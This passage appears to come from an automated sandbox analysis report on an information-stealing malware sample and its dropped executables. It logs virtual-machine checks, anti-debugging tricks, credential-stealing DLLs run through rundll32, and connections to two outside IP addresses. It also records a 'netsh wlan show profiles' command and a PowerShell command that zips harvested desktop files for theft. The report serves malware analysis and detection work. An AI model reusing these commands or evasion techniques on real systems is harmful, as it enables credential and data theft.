Source: MPGPH131.exe, 0000001D.00000002.3253650821.000000000126D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW(<+
Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tive Brokers - non-EU EuropeVMware20,11696428655
Source: MPGPH131.exe, 0000001D.00000002.3254763388.0000000001304000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 9e146be9-c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_9A5A6814
Source: MPGPH131.exe, 0000001C.00000002.3251490227.0000000007C9B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 9e146be9-c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_9A5A6814ZokPL[g
Source: c884f8452a.exe, 00000024.00000002.3143187486.0000000000568000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe System information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe System information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe System information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe System information queried: CodeIntegrityInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Thread information set: HideFromDebugger
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Thread information set: HideFromDebugger
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Code function: 0_2_051F0A3C Start: 051F0B37 End: 051F0AAB 0_2_051F0A3C
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe File opened: SIWVID
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Process queried: DebugPort
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Code function: 0_2_051F0CAD rdtsc 0_2_051F0CAD
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Code function: 0_2_00BB7BBB mov eax, dword ptr fs:[00000030h] 0_2_00BB7BBB
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Code function: 0_2_00BBB922 mov eax, dword ptr fs:[00000030h] 0_2_00BBB922
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_0073B922 mov eax, dword ptr fs:[00000030h] 2_2_0073B922
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_00737BBB mov eax, dword ptr fs:[00000030h] 2_2_00737BBB
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 3_2_0073B922 mov eax, dword ptr fs:[00000030h] 3_2_0073B922
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 3_2_00737BBB mov eax, dword ptr fs:[00000030h] 3_2_00737BBB
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Code function: 14_2_00395E8B mov eax, dword ptr fs:[00000030h] 14_2_00395E8B
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Code function: 14_2_00399B02 mov eax, dword ptr fs:[00000030h] 14_2_00399B02
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 193.233.132.56 80
Source: C:\Windows\System32\rundll32.exe Network Connect: 193.233.132.167 80
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Process created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe "C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe"
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe "C:\Users\user\AppData\Local\Temp\1000054001\amert.exe"
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe "C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe"
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe "C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe"
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe "C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe"
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Process created: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe "C:\Users\user\AppData\Local\Temp\1000187001\build12.exe"
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Process created: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Process created: unknown unknown
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe
Source: C:\Windows\System32\rundll32.exe Process created: unknown unknown
Source: 831840b410.exe, 00000010.00000002.3114626852.0000000000D62000.00000002.00000001.01000000.00000011.sdmp, 831840b410.exe, 0000001F.00000000.2949970716.0000000000D62000.00000002.00000001.01000000.00000011.sdmp, 831840b410.exe, 0000002F.00000000.3200529574.0000000000D62000.00000002.00000001.01000000.00000011.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe, SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe, 00000000.00000002.2140172034.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp, explorha.exe, explorha.exe, 00000003.00000002.2151766410.0000000000932000.00000040.00000001.01000000.00000008.sdmp Binary or memory string: ;Program Manager
Source: amert.exe, amert.exe, 0000000E.00000002.2840617908.0000000000556000.00000040.00000001.01000000.0000000F.sdmp, chrosha.exe, 0000000F.00000002.2880866448.0000000000266000.00000040.00000001.01000000.00000010.sdmp Binary or memory string: zProgram Manager
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Code function: 14_2_0037CD47 cpuid 14_2_0037CD47
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\BJZFPPWAPT.docx VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\DUUDTUBZFW.xlsx VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\GRXZDKKVDB.docx VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\PALRGUCVEH.docx VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\ZGGKNSUKOP.xlsx VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation
Source: C:\Windows\System32\netsh.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
